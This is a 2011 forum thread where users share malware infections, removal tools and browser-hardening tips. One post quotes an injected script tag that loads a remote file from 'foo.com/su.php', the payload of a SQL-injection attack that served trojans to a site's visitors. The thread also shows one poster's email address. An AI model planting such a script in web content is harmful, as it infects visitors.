Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Locked thread
Wheany
Mar 17, 2006

Spinyahahahahahahahahahahahaha!

Doctor Rope

JustFrakkingDoIt posted:

And on the same subject, anybody more knowledgeable know of reasons not to use Secunia PSI? I'm really liking it so far.

Personally, I don't really care enough that I'm running an outdated version of some software to be notified of it in real time. And it was another thing that churned my hard drive in the background. So I uninstalled it from my computer.

Adbot
ADBOT LOVES YOU

Hipster_Doofus
Dec 20, 2003

Lovin' every minute of it.
I tried it for the hell of it and all it showed me was that I'm very good at keeping things updated on my own. :smug:

Wheany
Mar 17, 2006

Spinyahahahahahahahahahahahaha!

Doctor Rope

Hipster_Doofus posted:

I tried it for the hell of it and all it showed me was that I'm very good at keeping things updated on my own. :smug:

The first time I ran it, it found some legit outdated software and I updated them. It also found a lot of outdated poo poo from D:\Old poo poo from old computer\Program files\whothefuck\evencares.exe, which I deleted to get a higher percentage.

After that I was mostly *I install some new software* *Secunia pops up a balloon "Software changes detected"*

Thanks for telling me I installed something.

Pilsner
Nov 23, 2002

My laptop just got hit with a drive-by virus just as I was casually browsing on it yesterday. I wasn't browsing any suspicious sites when it happened.

Suddenly, a pop-up baloon appeared in the system tray, warning me about an infection in some file. A fake icon looking just like the Windows Action Center appeared, but I couldn't click it. It came up with a fake virus scanner, and some more fake pop-ups. I opened the task manager, and saw a suspicious process with a garbled named. When I tried to end it, focus was taken away from the task manager. After about 30 seconds more, I could see the hard drive working a lot, and a bit later, the screen went dark. That's when I just shut it off forcibly. I rebooted in safe mode, ran HiJackThis, and found the executable, plus I installed and ran the MS Security Essentials, which found Trojan:DOS/Shetwirl.M. It removed it, but I took no chances and just nuked the whole laptop and installed a fresh Windows 7 SP1.

I used Firefox on the laptop, but I think (can't remember) I had noscript off, and didn't have FlashBlock, plus the flash player and Windows Updates were probably half a year to a year out of date, since I rarely use the laptop.

Lesson learned, use the full browser protection package, update frequently, and keep MS Security Essentials installed. I was just being a slacker because it was just a laptop with nothing important, but you never know.

von Braun
Oct 30, 2009


Broder Daniel Forever
A month back I got a Trojan called something along the lines of "Trojan.Rootkit.Hijack32" or something like that. When I first got it I was just browsing some site I have gone to for a few years without having a problem but suddenly I saw the Java screen pop-up and a few seconds later I got a Blue Screen and the PC re-booted.

I spent a few hours reading up on how to remove this bastard, following longs guides on some forum were the support guy just wanted Log files or whatever. I decided to check this thread instead and found TDSSKiller which removed the Trojan immediately.
But today, one of my hard drives (I have one 1TB and one 120GB Intel X-25 SSD) disappeared from "My Computer" and fixed it with a re-boot. After the re-boot my Windows just froze, the browser, Twitter client, everything except for the cursor. Before I knew it, I got a Blue Screen and an automatic re-boot and was then met with a "Hardware or software has been changed" message with a status code 0xc00000e and it refused to boot and I think I will try to re-install Windows 7 tomorrow.

The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?

Maniaman
Mar 3, 2006

von Braun posted:

The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?

Unless there is some new technology that allows viruses to embed themselves in the hardware, there's no virus that can survive a format/reinstall... unless it is somehow embedded in the MBR and it doesn't get wiped. In that case, just overwrite the entire drive with 0's.

Factory Factory
Mar 19, 2010

This is what
Arcane Velocity was like.
The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

von Braun posted:

A month back I got a Trojan called something along the lines of "Trojan.Rootkit.Hijack32" or something like that. When I first got it I was just browsing some site I have gone to for a few years without having a problem but suddenly I saw the Java screen pop-up and a few seconds later I got a Blue Screen and the PC re-booted.

I spent a few hours reading up on how to remove this bastard, following longs guides on some forum were the support guy just wanted Log files or whatever. I decided to check this thread instead and found TDSSKiller which removed the Trojan immediately.
But today, one of my hard drives (I have one 1TB and one 120GB Intel X-25 SSD) disappeared from "My Computer" and fixed it with a re-boot. After the re-boot my Windows just froze, the browser, Twitter client, everything except for the cursor. Before I knew it, I got a Blue Screen and an automatic re-boot and was then met with a "Hardware or software has been changed" message with a status code 0xc00000e and it refused to boot and I think I will try to re-install Windows 7 tomorrow.

The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?

TDSS can be a real pain in the balls - and it'll usually gently caress you over if you don't remove it before doing anything. It'll also make OEM images fail.

In your case, I don't really think the two are related. You didn't give us much information. Are both drives connected to the same controller? Have you tried changing ports? Did you try a different controller? What about Last Known Good Config, Safe Mode, or the Recovery Console? Your best plan of attack here is to get back into windows somehow, and run TDSSKiller from there.

For all we know though, it could be any one of a wide range of issues cropping up.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Factory Factory posted:

The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.

Infected MBR was a common feature with a ton of viruses throughout the 90s and early 2000s.

A Real Happy Camper
Dec 11, 2007

These children have taught me how to believe.
Had a friend get hit with System Tool today, after a little google and some scanning I managed to come out of it one bottle of booze richer. :toot:

He found it hilarious that my first reaction to seeing his computer was "oh yeah, I've seen this before!"

von Braun
Oct 30, 2009


Broder Daniel Forever

PopeOnARope posted:

In your case, I don't really think the two are related. You didn't give us much information. Are both drives connected to the same controller? Have you tried changing ports? Did you try a different controller? What about Last Known Good Config, Safe Mode, or the Recovery Console? Your best plan of attack here is to get back into windows somehow, and run TDSSKiller from there.

For all we know though, it could be any one of a wide range of issues cropping up.

I have tried changing ports on the motherboard and trying to boot it with only the system disk (the SSD) connected and then it tells me to insert a "Boot Media in selected Boot Device". And for the Last Good Config and Safe Mode I can't really get that far into the boot process.

Unless I can make something happen I will attempt a re-format later today.

sfwarlock
Aug 11, 2007

von Braun posted:

I have tried changing ports on the motherboard and trying to boot it with only the system disk (the SSD) connected and then it tells me to insert a "Boot Media in selected Boot Device". And for the Last Good Config and Safe Mode I can't really get that far into the boot process.

Unless I can make something happen I will attempt a re-format later today.

Get your hands on a boot CD (linux live cd, or a version of Hiren's with Mini XP, hilariously illegal as that is) and take a look at the drives.

von Braun
Oct 30, 2009


Broder Daniel Forever
I decided to just re-format my PC and everything is working fine. I have license of NOD, is there anything else I should have to prevent this poo poo from happening again other than not visit suspicious sites?

Thanks for your help!

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

von Braun posted:

I decided to just re-format my PC and everything is working fine. I have license of NOD, is there anything else I should have to prevent this poo poo from happening again other than not visit suspicious sites?

Thanks for your help!

(this needs to be in the OP in gigantic red font)

Update Flash, Update Java. Firefox + NoScript. Take regular backups - image backups even so you can just roll back at a moment's notice. If all else fails, try a pact with Satan.

Megiddo
Apr 27, 2004

Unicorns bite, but their bites feel GOOD.

PopeOnARope posted:

(this needs to be in the OP in gigantic red font)

Update Flash, Update Java. Firefox + NoScript. Take regular backups - image backups even so you can just roll back at a moment's notice. If all else fails, try a pact with Satan.
There's really a lot more to it than that, if you want to keep your machine secure:

Use Firefox or Chrome with NoScript and Adblock Plus and disable/uninstall any unneeded plugins. Make sure your browser is kept up to date with automatic updates. Check Mozilla's plugin check regularly to see if you have vulnerable plugins. Make sure you are receiving Microsoft updates for all Microsoft software (not just Windows), and keep all third-party software up-to-date that interacts with downloaded material of any kind, whether it has a plugin for a browser or not.

Only install Java when you actually need it and uninstall it promptly when finished. If you need to have Java installed all the time due to Java-dependent software, keep it updated at all times and disable Java plug-ins/add-ons in all your browsers. Keep in mind that Oracle rarely issues "out-of-band" critical updates/patches for Java, leaving security and bug fixes for the next quarterly release - and leaving you vulnerable until Oracle's next scheduled release. Unless you don't have it installed in the first place, of course.

Keep Adobe Acrobat, Adobe Reader, or any third-party PDF viewers up-to-date and ideally disable their plug-in/add-on. Make sure Acrobat/Reader security settings are set for maximum security: delete the Flash authplay.dll that's bundled with Acrobat/Reader, disable javascript, disallow multimedia operations, enable enhanced security, disallow opening of non-PDF files.

Keep Adobe Flash and Adobe Shockwave updated. Make sure Flash is set to check for updates automatically. Do not install Shockwave unless you actually need it as many people neglect to check for Shockwave updates and Adobe does not have an option to automatically check for Shockwave updates.

Keep Apple Quicktime updated, or either disable the plug-in/add-on on all browsers or just don't install Quicktime. If you use VLC, Winamp, or some other media player, make sure that it is updated as they have been known to have critical vulnerabilities with some types of files.

Any other programs that interact with downloaded files should be kept updated. For example, if you use uTorrent, even without a browser plug-in, you are still opening downloaded .torrent files that could exploit older versions of uTorrent with critical vulnerabilities.

If you're in a locked-down corporate, university, or public machine where you cannot update plugins, browsers, uninstall Java, etc. - use a USB flash drive with Portable Apps configured for secure and private browsing.

But good luck getting even experienced computer enthusiasts or professionals to do the above, let alone the casual user.

Megiddo fucked around with this message at 00:53 on Mar 21, 2011

hackedaccount
Sep 28, 2009
Good summary. The only other things you might want to mention are that people use MSE, FlashBlock, and what exactly the various removal programs do.

Looks this this thread is about 3 years old, you might want to start a new one.

BillWh0re
Aug 6, 2001


I find NoScript to be more trouble than it's worth to be honest. Using AdBlock and a browser that blocks known malicious sites (Firefox and IE both do, I assume Chrome does too) is less intrusive and still quite effective.

Megiddo
Apr 27, 2004

Unicorns bite, but their bites feel GOOD.

BillWh0re posted:

I find NoScript to be more trouble than it's worth to be honest. Using AdBlock and a browser that blocks known malicious sites (Firefox and IE both do, I assume Chrome does too) is less intrusive and still quite effective.
The problem with just using AdBlock and/or FlashBlock is that they don't block the execution of scripts or prevent content from downloading - in many, if not most, cases they just block it from displaying in the browser by merely hiding the ad content. Unless you block the scripts from running in the first place with something like NoScript, you're still open to attack from malicious scripts.

BillWh0re
Aug 6, 2001


Megiddo posted:

The problem with just using AdBlock and/or FlashBlock is that they don't block the execution of scripts or prevent content from downloading - in many, if not most, cases they just block it from displaying in the browser by merely hiding the ad content. Unless you block the scripts from running in the first place with something like NoScript, you're still open to attack from malicious scripts.

AdBlock Plus for Firefox does stop content from being downloaded. I'm not sure about other browsers (I think the Chrome one was recently updated to do this). You can probably test by killing Flash, opening a new browser window and browsing a site with a single blocked Flash ad, then seeing if Flash has been loaded.

The problem I have with NoScript is really that it's so fiddly and most users won't know which sites to allow, because there are a whole lot of legitimate uses for cross-domain javascript loading these days. Also, in cases where the malicious JS is embedded in the compromised page itself, it's not so useful since you probably already whitelisted the page.

If you know in advance that you're going to be visiting some compromised or malicious sites then NoScript is great, but for regular browsing it's overkill by far and steps over the line from "good enough security" to "interfering with productivity".

RCK-101
Feb 19, 2008

If a recruiter asks you to become a nuclear sailor.. you say no
Sup goons, my kid brother's laptop just got Antivirus 2011 (jesus christ), and I wanted to know, what is the best way of removing/purging this horrible being from beyond space and time?

Ghost Mutt
May 10, 2009

Ryand-Smith posted:

Sup goons, my kid brother's laptop just got Antivirus 2011 (jesus christ), and I wanted to know, what is the best way of removing/purging this horrible being from beyond space and time?

From memory I think it's just a couple of files located in C:\ProgramData\<randomlettersmumbers>\<randomlettersmumbers>.exe
Pretty sure that is just for Vista/7 though. Also boot in to Safe Mode first.

But the easiest way is to just run ComboFix or MalwareBytes. (or both!)

univbee
Jun 3, 2004




beastathon posted:

From memory I think it's just a couple of files located in C:\ProgramData\<randomlettersmumbers>\<randomlettersmumbers>.exe
Pretty sure that is just for Vista/7 though. Also boot in to Safe Mode first.

But the easiest way is to just run ComboFix or MalwareBytes. (or both!)

On XP it's often located in C:\Documents and Settings\All Users\[random]\[random].exe ; hell, sometimes it will even create a desktop shortcut that gives away the location if you check its properties!

Scaramouche
Mar 26, 2001

SPACE FACE! SPACE FACE!

Yeah it's pretty easy to remove, you can usually do it just by checking the hijack this settings. One thing to watch out for (though perhaps less likely for scareware) is if it phones home before you caught it, it might download something else through the same exploit/another exploit it makes itself. Normally I'd say this stuff rarely exists in isolation, but I'm actually finding that the attendant 'ecosystem' that accompanies scareware is a bit less diverse now. I'm not sure if it's because they don't want to mess up the computer before they get a payment, or if the infectors are starting to specialize in terms of their payloads.

m2pt5
May 18, 2005

THAT GOD DAMN MOSQUITO JUST KEEPS COMING BACK

Scaramouche posted:

Normally I'd say this stuff rarely exists in isolation, but I'm actually finding that the attendant 'ecosystem' that accompanies scareware is a bit less diverse now. I'm not sure if it's because they don't want to mess up the computer before they get a payment, or if the infectors are starting to specialize in terms of their payloads.

It could also be that people are catching older viruses or scareware that is trying to connect to servers that have already been taken down.

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

Has anyone tried changing the registry permissions on the group policy keys so the user and system can't write to them? I have a guy who keeps stumbling in to viruses that set them to do things like lock his desktop to some warning message and whatnot. My hope is that the majority of these viruses are too dumb to actually modify permissions before they write there, and the policy keys are more headache than they are worth on XP Home. Hopefully it doesn't break anything.

Scaramouche
Mar 26, 2001

SPACE FACE! SPACE FACE!

BangersInMyKnickers posted:

Has anyone tried changing the registry permissions on the group policy keys so the user and system can't write to them? I have a guy who keeps stumbling in to viruses that set them to do things like lock his desktop to some warning message and whatnot. My hope is that the majority of these viruses are too dumb to actually modify permissions before they write there, and the policy keys are more headache than they are worth on XP Home. Hopefully it doesn't break anything.

I've never been a fan of doing it manually, instead preferring solutions like Deep Freeze et al.

Factory Factory
Mar 19, 2010

This is what
Arcane Velocity was like.
DEP just killed Chrome's Flash on me, throwing an error about illegal execution with a very long Chinese-character window title, but I can't tell what ad is throwing it. The only ads-displaying site I have going is SA, but the dialog is modal and I'm only using one window so I can't scroll around without dealing with it.

Anyone know what this is? Maybe the bad ad referenced in the QCS sticky?

Diet Crack
Jan 15, 2001

I just picked up the 2011 Security Virus aswell. Mine is named "XP Home Security 2011" and it seems it has evolved into taking over in safe mode aswell. At the moment I've rkilled it using a .com file (all .exe run another instance of 678.tmp, which is nowhere to be found on my hard drive after I deleted it) and am running MABM as I write this, and it has found 4, so hopefully I'm on the money.

This one is a bit of a bitch if you don't have another PC or OS to fall back on, because you need to kill the .tmp file from running over and over and disallowing you to run any .exe or anti virus programs.

If this all works out I'll post the link I followed.

Edit: Success.
http://www.bleepingcomputer.com/virus-removal/remove-win-7-internet-security-2011

The Temp and Reg files are all different though for me. Mine was a set of 3 numbered .tmp files.

Diet Crack fucked around with this message at 19:02 on Mar 23, 2011

sfwarlock
Aug 11, 2007

Diet Crack posted:

I just picked up the 2011 Security Virus aswell. Mine is named "XP Home Security 2011" and it seems it has evolved into taking over in safe mode aswell. At the moment I've rkilled it using a .com file (all .exe run another instance of 678.tmp, which is nowhere to be found on my hard drive after I deleted it) and am running MABM as I write this, and it has found 4, so hopefully I'm on the money.

This one is a bit of a bitch if you don't have another PC or OS to fall back on, because you need to kill the .tmp file from running over and over and disallowing you to run any .exe or anti virus programs.

If this all works out I'll post the link I followed.

Edit: Success.
http://www.bleepingcomputer.com/virus-removal/remove-win-7-internet-security-2011

The Temp and Reg files are all different though for me. Mine was a set of 3 numbered .tmp files.

I had to kill that this morning. Watch out for it unregistering your .exe associations.

sonicice
Oct 21, 2000

Michael J Beverage, I've got a bone to pick with you.
TDSS has been a real pain in the rear end for me lately. I've had TDSSKiller kill two computers after running it (although one I got back by restoring the registry backup from /windows/system32/config/regback), but I've had another machine where it has kept coming back over the past few months, even when I've pulled the hard drive out, hooked it to another machine and ran TDSSKiller and it removes it from there, deleted old restore points and all that poo poo. It will say it's gone, but then it's back again 3 weeks later. I don't loving know what the deal is.

Maniaman
Mar 3, 2006
It's either not gotten cleaned up all the way or its a user/id 10 t error. I'm more willing to wager a user error.

PopeOnARope
Jul 23, 2007

Hey! Quit touching my junk!

Maniaman posted:

It's either not gotten cleaned up all the way or its a user/id 10 t error. I'm more willing to wager a user error.

Or the DNS settings on the router it's connected to are hosed.

PUBLIC TOILET
Jun 13, 2009

The owner of the company I work for managed to contract computer AIDS this week. Internet Explorer kept crashing on his Windows Vista notebook. We upgrade the browser, works briefly then starts crashing again. This throws a red flag for me. I fire up Malwarebytes and start a scan. In the background, I swap network connections and magically Internet Explorer starts working fine again. For the hell of it I go through the hosts file. Page after page of various anti-virus, anti-malware, etc. sites being blocked. :ughh: Try to fire up the Kaspersky rescue disk and it's constantly failing database updates saying the database is corrupted every time.

Wipe MBR, wipe drive, reinstall.

crestfallen
Aug 2, 2009

Hi.
Read the last few pages on a whim and drat, I learned about a lot of new tools.

I subscribe to the "don't be an idiot" philosophy and that has done a lot to keep me safe. And Adblock on most sites, plus script blocking extensions. And generally keeping software, etc. patched up.

Previously I was using avast! but it sounds like there are better options out there now. I installed MSE based on a ton of good praise and man, I like it a lot.

Question: a lot of you mention using multiple tools, which makes sense. However, when using something like MSE, would you also use things like MalwareBytes and SAS? Or do you primarily stick with one main antivirus/monitoring program and maybe fire up SAS once every couple weeks or something?

Just curious. I know all these things have gotten much more complex in recent years so I just want to avoid any weird conflicts between programs and so on.

feld
Feb 11, 2008

Out of nowhere its.....

Feldman

Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script>

They said customers were complaining about getting trojans after visiting the site; each pageload was like 60 requests to that file. No idea what it did because by the time it was reported to us the file was gone from the server.


:smith:

Seat Safety Switch
May 27, 2008

MY RELIGION IS THE SMALL BLOCK V8 AND COMMANDMENTS ONE THROUGH TEN ARE NEVER LIFT.

Pillbug

feld posted:

Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script>

They said customers were complaining about getting trojans after visiting the site; each pageload was like 60 requests to that file. No idea what it did because by the time it was reported to us the file was gone from the server.


:smith:
Something like this happened to me at another job, except they did an embedded reference to a javascript file (which probably loaded an exploit or at least did an XSS attack of some kind). It was pretty clumsy though, which made me think that whoever did it didn't really know what they were doing. A lot of the data was sanitized for output, obviously, so it never became raw HTML but instead cluttered up the page with HTML.

That was when I found out that they didn't have a backup or transaction log for their production SQL database, so I got to look up the "attacker" query in the IIS logs, decode it and then reverse it after closing the hole that let them do a SQL injection in the first place. That was a fun week, and a really fun way to learn about cursors.

Some data got lost if the embed string + existing data in the column in the row was too long, too, so "Foobarblahblahblah" would become "FoobarblEXPLOITEXPLOIT" and of course that couldn't be reversed. I think they put some random data entry person on trying to rebuild that stuff. :smithicide:

Seat Safety Switch fucked around with this message at 05:45 on Mar 30, 2011

The Reaganomicon
Oct 14, 2010

by Lowtax

Seat Safety Switch posted:

Something like this happened to me at another job, except they did an embedded reference to a javascript file (which probably loaded an exploit or at least did an XSS attack of some kind). It was pretty clumsy though, which made me think that whoever did it didn't really know what they were doing. A lot of the data was sanitized for output, obviously, so it never became raw HTML but instead cluttered up the page with HTML.

That was when I found out that they didn't have a backup or transaction log for their production SQL database, so I got to look up the "attacker" query in the IIS logs, decode it and then reverse it after closing the hole that let them do a SQL injection in the first place. That was a fun week, and a really fun way to learn about cursors.

Some data got lost if the embed string + existing data in the column in the row was too long, too, so "Foobarblahblahblah" would become "FoobarblEXPLOITEXPLOIT" and of course that couldn't be reversed. I think they put some random data entry person on trying to rebuild that stuff. :smithicide:

Should've told them it was beyond salvation and rammed the point home re: backups.

CraigK
Nov 4, 2008

by exmarx
personal info deleted

CraigK fucked around with this message at 01:28 on Mar 8, 2012

Prosthetic_Mind
Mar 1, 2007
Pillbug
At a glance, if Craig3410@gmail.com is your email address, either someone hacked your email or is spoofing your email address.

If it's the former, one of the computers you have used to check your email is/was probably rooted and someone stole your password, or they could just be spoofing your email address, it's trivially easy. I'd suggest changing your password and running something like RootkitRevealer on all the machines you check your mail on (assuming a 32 bit version of windows), and working from there. If someone is spoofing your email address, there isn't a whole lot you can do other than move to a new one.

Prosthetic_Mind fucked around with this message at 20:59 on Mar 30, 2011

Adbot
ADBOT LOVES YOU

CraigK
Nov 4, 2008

by exmarx

Prosthetic_Mind posted:

At a glance, if Craig3410@gmail.com is your email address, either someone hacked your email or is spoofing your email address.

If it's the former, one of the computers you have used to check your email is/was probably rooted and someone stole your password, or they could just be spoofing your email address, it's trivially easy. I'd suggest changing your password and running something like RootkitRevealer on all the machines you check your mail on (assuming a 32 bit version of windows), and working from there. If someone is spoofing your email address, there isn't a whole lot you can do other than move to a new one.

Yeah, it's mine.

I'm going to make a new account as soon as I can access my Google Docs, get my stuff, and close it.

  • Locked thread